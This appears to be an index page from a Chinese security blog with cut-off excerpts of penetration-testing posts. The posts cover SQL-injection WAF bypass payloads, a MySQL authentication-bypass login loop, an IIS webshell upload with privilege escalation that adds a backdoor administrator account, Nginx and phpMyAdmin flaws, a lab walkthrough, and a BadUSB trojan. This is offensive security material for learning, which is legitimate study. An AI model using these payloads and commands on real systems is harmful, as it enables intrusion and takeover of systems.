某狗SQL注入WAF绕过
前言这里使用sqli-labs第一关字符型注入来测试
union注入测试绕过and 1=1先使用and 1=1和and 1=2直接被拦截这里绕过方法是使用&&(%26%26)代替and,后面是个条件,可以使用True和False代替
绕过order by之前版本绕过order by的方法很简单就是使用内联注释,如/*!order*//**//*!by*/来绕过,但是现在不行了,于是在网上看了看其它WAF绕过方式,发现order/*!60000ghtwf01*/by可以实现绕过,数字要大于50000,不然就是报错,后面随便接字母
绕过union select尝试使用order by的绕过姿势,union/*!60000ghtwf01*/select,发现成功绕过#绕过database()直接查询database()会被拦截使用database/**/()可以绕过使用-加上任意一个不存在的函数可以报错出数据库名,比如-ghtwf01()
绕过schema_name查询所有数据库名时,使用schema_name会被拦截,这里使用内联注释绕过
1http://127. ...
mysql数据库漏洞利用及提权方式小结
CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前
漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次
漏洞复现msf利用hash解密得到密码即可登录
python exp12345#!/usr/bin/pythonimport subprocesswhile 1: subprocess.Popen("mysql -u root -p -h 192.168.0.16 --password=test", shell=True).wait()
shell exp1for i in `seq 1 1000`; do mysql -u root -p -h 192.168.0.16 --password=bad 2>/dev/null; done
Mysql UDF提权如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下如果mysql版本小于5.1,udf.dll文件在windo ...
点击劫持、Self-XSS、复制粘贴劫持的组合攻击学习——XSS劫持
点击劫持这一篇总结得很清楚也很通俗易懂(手动滑稽)https://blog.csdn.net/qq_32523587/article/details/79613768
Self-XSS一些网站为了用户体验着想会有这么一个功能,就是用户在提交信息失败并且需要返回去填的时候会帮你自动把之前填写的信息补全回来,这样就避免了用户的重新输入,节省了用户的时间。这是一个很好很人性化的功能,但是这种补全可能不那么被重视,所以很多网站也不会对输出进行过滤,这样就可能存在XSS漏洞,而我遇到的场景也是这样的:用户登录失败的时候网站会自动把上次尝试登陆的用户名补全,但是并没有对用户名信息进行过滤,所以就存在 XSS,但是用户怎么会输入XSS payload打自己,所以就特别的鸡肋几乎无用
复制粘贴劫持无论用户复制了什么,粘贴的时候始终是黑客自定义的内容
组合攻击——XSS劫持修改参考这个靶场:https://security.love/XSSJacking/index1.html,存在Self-XSS的页面,需要引入angular.min.js和main.js,主要是有一个文本输入框,其中ng-chang ...
bluecms v1.6 sp1 代码审计
网站目录结构
网站基本防护/include/common.inc.php第30-36行对$_GET、$_POST、$_COOKIES、$_REQUEST使用deep_addslashes()函数过滤一遍,漏了$_SERVER
1234567if(!get_magic_quotes_gpc()){ $_POST = deep_addslashes($_POST); $_GET = deep_addslashes($_GET); $_COOKIES = deep_addslashes($_COOKIES); $_REQUEST = deep_addslashes($_REQUEST);}
追踪一下deep_addslashes()函数/include/common.fun.php第14-28行
123456789101112131415function deep_addslashes($str){ if(is_array($str)) { foreach($str as $key=>$val) ...
Web中间件漏洞总结之IIS漏洞
PUT漏洞前提条件:IIS 6.0开启了WebDAV并且拥有IIS来宾用户拥有写入权限复现过程:用IIS PUT SCANNER探测一下目标IIS是否拥有写入权限是YES所以可以利用先看原来的服务器上面存在的内容我们利用另一个工具对文件进行写入,我们写入一句话webshell上传test.txt成功上传上去是txt格式,于是我们用MOVE或者COPY选项把它改成asp后缀菜刀连一下,拿到webshell
提权上传cmd.exe和pr.exe上去,这二者的用法是pr提权执行下面这条命令,把当前终端的执行程序设置成我们上传的 cmd.exe
1setp "路径cmd.exe"
然后我们就可以pr提权,查看一下当前是system权限于是我们新建管理员账户
123pr.exe "net user hack1 123 /add" 新建一个hack1用户,密码为123pr.exe "net localgroup administrators hack1 /add" 将hack1用户加入administrators管理员组
如果对方开启 ...
Web中间件漏洞总结之Nginx漏洞
解析漏洞漏洞简介:对于任意文件名,在后面加上/任意文件名.php后该文件就会以php格式进行解析,是用户配置不当造成的漏洞复现:在网站根目录新建test.jpg,里面写入phpinfo(),打开试一下试一试Nginx的解析漏洞,在后面加上/x.php对于低版本的php能够直接解析成功,高版本php因为引入了security.limit_extensions,限制了可执行文件的后缀,默认只允许执行.php文件,这里来看看两个与Nginx解析漏洞相关的核心配置核心配置:cgi.fix_pathinfo该选项位于配置文件php.ini中,默认值为1,表示开启。当php遇到文件路径/aaa.xxx/bbb.yyy/ccc.zzz时,若/aaa.xxx/bbb.yyy/ccc.zzz不存在,则会去掉最后的/ccc.zzz,然后判断/aaa.xxx/bbb.yyy是否存在,若存在,则把/aaa.xxx/bbb.yyy当做文件/aaa.xxx/bbb.yyy/ccc.zzz解析,若/aaa.xxx/bbb.yyy仍不存在,则继续去掉/bbb.yyy,以此类推。若是关闭该选项,访问 http ...
一文让PHP反序列化从入门到进阶
序列化与反序列化序列化定义:利用serialize()函数将一个对象转换为字符串形式我们先看一下直接输出对象是什么效果,代码如下
12345678<?php class test{ public $name="ghtwf01"; public $age="18"; } $a=new test(); print_r($a);?>
效果如下这个时候我们利用serialize()函数将这个对象进行序列化成字符串然后输出,代码如下
123456789<?php class test{ public $name="ghtwf01"; public $age="18"; } $a=new test(); $a=serialize($a); print_r($a);?>
效果如下
如果不是public方法那么后面的读取方法就有点不一样,例如代码如下
12345678910<?php class test{ public $name ...
CVE-2018-12613 phpMyAdmin远程文件包含漏洞分析
漏洞影响范围:phpMyAdmin 4.8.0和4.8.1漏洞分析:index.php 55-63行
123456789if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit;}
这里需要满足如下5个条件便可以执行包含文件代码include $_REQUEST['targe ...
DC1-3靶机渗透实战与经验小结
前言:DC类靶机是比较入门的一类靶机,适合没有打过靶机或者经验不丰富的朋友玩,每一个靶机打下来都会get新姿势下载链接:http://www.five86.com/DC-1渗透过程:
nmap全扫存活主机及端口 nmap -sV 192.168.1.1/24
进入靶机80端口的网站,发现是drupal cms,用御剑或者dirb扫描网站目录没有发现有敏感文件,于是使用msf查找该cms有哪些可利用的漏洞
发现2018年那个漏洞可以直接利用,连接成功
进入shell,查看目录发现flag1.txt,打开
提示信息说每个cms都有一个配置文件,于是猜测第二个flag藏在配置文件里面,最后在/var/www/sites/default/settings.php里面找到flag2.txt查看flag2.txt发现里面有数据库的各种信息
得到信息后连接mysql数据库,发现连接不上,于是暂时搁置换一个思路linux下有两个存放密码的路径,/etc/passwd和/etc/shadow二者 ...
利用badusb对用户进行木马远控
最近接触到利用badsub进行攻击的方法,于是自己研究了一波,先给出一个badusb木马远控案例。
badusb简介
badusb是一种类似于U盘,插入后就会自动执行里面的恶意代码进行恶意操作,由于恶意代码是存在badusb存放固件的区域中,所以杀毒软件和U盘格式化都不能防御badusb的攻击
badusb基本语法和arduino按键代码
入门badusb参考视频教程:https://www.bilibili.com/video/av20517610?from=search&seid=10154231350179524417
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495delay(5000);//延时毫秒Keyboard.begin(); //开始键盘通讯Keyboard. ...